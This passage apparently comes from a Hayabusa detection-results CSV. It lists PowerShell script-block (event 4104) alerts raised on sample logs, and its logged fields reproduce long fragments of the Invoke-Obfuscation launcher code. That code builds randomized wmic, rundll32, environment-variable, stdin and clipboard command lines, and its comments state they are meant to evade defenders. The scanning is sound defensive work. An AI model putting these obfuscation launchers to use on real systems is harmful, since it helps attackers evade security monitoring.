@('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. $ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. $ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"splay the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $InvokeVariableSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 6 { ############ ## STDIN+ ## ############ # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellStdin = Out-RandomPowerShellStdInInvokeSyntax # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellStdin $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 1 -Maximum 3) + '|' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 7 { ########### ## CLIP+ ## ########### # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking powershell.exe's StdIn. $PowerShellClip = Out-RandomClipboardInvokeSyntax # If this launcher is run in PowerShell 2.0 then Single-Threaded Apartment must be specified with -st or -sta. # Otherwise you will get the following error: ""Current thread must be set to single thread apartment (STA) mode before OLE calls can be made."" # Since Invoke-Obfuscation output is designed to run on any PowerShell version then for this launcher we will add the -st/-sta flag to $PowerShellFlags. # If selected then the -Command flag needs to remain last (where it currently is). $CommandFlagValue = $NULL If($PSBoundParameters['Command'] -OR $Command) { $UpperLimit = $PowerShellFlagsArray.Count-1 $CommandFlagValue = $PowerShellFlagsArray[$PowerShellFlagsArray.Count-1] } Else { $UpperLimit = $PowerShellFlagsArray.Count } # Re-extract PowerShellFlags so we can add in -st/-sta and then reorder (maintaining command flag at the end if present). $PowerShellFlags = @() For($i=0; $i -lt $UpperLimit; $i++) { $PowerShellFlags += $PowerShellFlagsArray[$i] } # Add in -st/-sta to PowerShellFlags. $PowerShellFlags += (Get-Random -Input @('-st','-sta')) # Randomize the order of the command-line arguments. # This is to prevent the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($CommandFlagValue) { $PowerShellFlags += $CommandFlagValue } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $PowerShellClip $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $Echo + (Get-Random -Input ('/','\',' '*(Get-Random -Minimum 1 -Maximum 3))) + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 2) + '|' + ' '*(Get-Random -Minimum 0 -Maximum 2) + $PathToClip + ' '*(Get-Random -Minimum 0 -Maximum 2) + '&&' + ' '*(Get-Random -Minimum 1 -Maximum 3) + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 8 { ########### ## VAR++ ## ########### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = ([Char[]]$SetSyntax2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeOption = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Add additional escaping for vertical pipe (and other characters defined below) if necessary since this is going inside an environment variable for the final $CmdLineOutput set below. ForEach($Char in @('<','>','|','&')) { If($InvokeOption.Contains(""^$Char"")) { $InvokeOption = $InvokeOption.Replace(""^$Char"",""^^^$Char"") } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) + $InvokeOption $CmdSyntax2 = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 2) + ""%$VariableName2%"" $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $SetSyntax2 + $PathToPowerShell + $PSCmdSyntax + '&&' + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToCmd + $CmdSyntax2 + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax2) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 9 { ############# ## STDIN++ ## ############# # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName2 = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName2 = ([Char[]]$VariableName2.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' $SetSyntax2 = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax2 = $SetSyntax2 + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName2 + '=' # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariable = @() $ExecContextVariable += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'variable:' + (Get-Random -Input @('Ex*xt','E*",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious 